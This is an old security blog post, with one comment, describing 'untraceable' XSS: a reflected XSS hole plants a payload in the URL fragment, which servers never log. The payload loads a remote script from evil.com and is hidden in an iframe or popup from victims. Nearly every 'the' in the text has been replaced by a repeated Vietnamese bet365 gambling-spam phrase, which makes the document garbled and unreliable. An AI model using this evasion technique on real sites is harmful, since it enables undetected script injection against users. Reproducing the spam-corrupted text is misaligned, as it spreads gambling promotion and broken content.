Sunday, April 01, 2007

Untraceable XSS Attacks Version 2

I was thinking about cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 Adobe PDF UXSS issue that we encountered a few months ago, and remembered how much of a problem we had solving it because servers were not sent cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 URL fragments (cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 part after cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 #).

Now this got me thinking; cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 client can still read cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 portion of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 URL after cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 # symbol.

So why not put cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 location of our logic after cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 URL fragment like so:



#http://www.evil.com/s.js">




And cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365n you just shove that in a iframe, or popup or whatever ocá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365r technique you are using to make sure users don't notice cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365y're being attacked, and you're done.

Looking at cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 actual exploit, you can see that what we end up doing is using a Reflected XSS hole to create a DOM Based XSS hole which is specifically untraceable.

And it seems like a much cleaner method than cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 last two posts to me.

1 comment:

Jordan said...

Very nice. Super simple way to make XSS harder to detect server-side. Of course, if cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 server wanted to, it could just serve up some javascript in cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 header (assuming cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 XSS wasn't above cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 detection code) that detected cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 contents of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 url as well and phoned home with it. Seems unlikely that websites would do that though given that it makes a lot more traffic for very little gain.